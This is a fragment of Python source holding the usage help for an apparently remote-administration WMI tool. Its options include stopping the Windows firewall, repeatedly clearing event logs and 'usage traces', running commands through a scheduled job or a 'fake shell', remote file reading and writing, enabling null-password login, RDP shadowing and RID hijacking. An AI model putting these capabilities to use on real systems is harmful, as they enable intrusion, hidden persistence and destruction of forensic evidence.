winrm service\n" 237 | "python wmi_query -i -u -p -F query # query all Firewall rule\n" 238 | "python wmi_query -i -u -p -F query1 #query Enable Firewall rule\n" 239 | "python wmi_query -i -u -p -F query2 #query Disable Firewall rule\n" 240 | "python wmi_query -i -u -p -F querya #query inbound Firewall rule\n" 241 | "python wmi_query -i -u -p -F queryb #query outbound Firewall rule\n" 242 | "python wmi_query -i -u -p -F query1a #query Enable inbound Firewall rule\n" 243 | "python wmi_query -i -u -p -F query2a #query Disable inbound Firewall rule\n" 244 | "python wmi_query -i -u -p -F query1b #query Enable outbound Firewall rule\n" 245 | "python wmi_query -i -u -p -F query2b #query Disable outbound Firewall rule\n" 246 | "python wmi_query -i -u -p -F query3 #query InstanceID Firewall rule\n" 247 | "python wmi_query -i -u -p -F delete #delete InstanceID Firewall rule\n" 248 | "python wmi_query -i -u -p -F disable #Disable a firewall rule\n" 249 | "python wmi_query -i -u -p -F enable #Enable a firewall rule\n" 250 | "python wmi_query -i -u -p -f query #query Firewall\n" 251 | "python wmi_query -i -u -p -f stop #stop Firewall\n" 252 | "python wmi_query -i -u -p -F start #start Firewall\n" 253 | "python wmi_query -i -u -p -V #(vbs_id:Example) Run Vbs (The vbs is run repeatedly at intervals of 2 seconds, and the --stop_vbs parameter must be used to stop)\n" 254 | "python wmi_query -i -u -p --stop_vbs /--stop_vbs 1 #-- stop 1 stop default(vbsid:Example) vbs running on repeat/stop use --stop \n" 255 | "python wmi_query -i -u -p --one_vbs #vbs that only runs once\n" 256 | "python wmi_query -i -u -p --execute_command #To execute the command through Win32_ScheduledJob (NT 6.0), you need to wait for 1 minute\n" 257 | "python wmi_query -i -u -p --clear_eventlog #cear eventlog logName:appllication,system,setup,forwardedevents,security\n" 258 | "python wmi_query -i -u -p --clear_eventlog --cycle_clear# This will execute clear EventLog vbs forever(To stop use --stop )\n" 259 | 
"python wmi_query -i -u -p --execute_command2 #execute command\n" 260 | "python wmi_query -i -u -p --shell #Command execution mode 2 to get a fake shell\n" 261 | "python wmi_query -i -u -p --writefile --save-to-file # remote file writing\n" 262 | "python wmi_query -i -u -p --readfile --save-to-file # remote file reading\n" 263 | "python wmi_query -i -u -p --ls #Query files and folders of a certain path\n" 264 | "python wmi_query -i -u -p --rdp-shadow #Rdp Shadow Setting\n" 265 | "python wmi_query -i -u -p --nulllogin 0 #Enable null password login\n" 266 | "python wmi_query -i -u -p --nulllogin 0 #Disable null password login\n" 267 | "python wmi_query -i -u -p --user-rid-query #Users RID Query\n" 268 | "python wmi_query -i -u -p --ridhijack 1f5(src_id),1f4(target_rid) #Rid Hijack Example\n" 269 | "python wmi_query -i -u -p --set-user ,0 #Disable User\n" 270 | "python wmi_query -i -u -p --set-user ,1 #Enable User\n" 271 | "python wmi_query -i -u -p --cleartrace #Clear usage traces,On cycle clearEventLog Security") 272 | parser.print_help() --------------------------------------------------------------------------------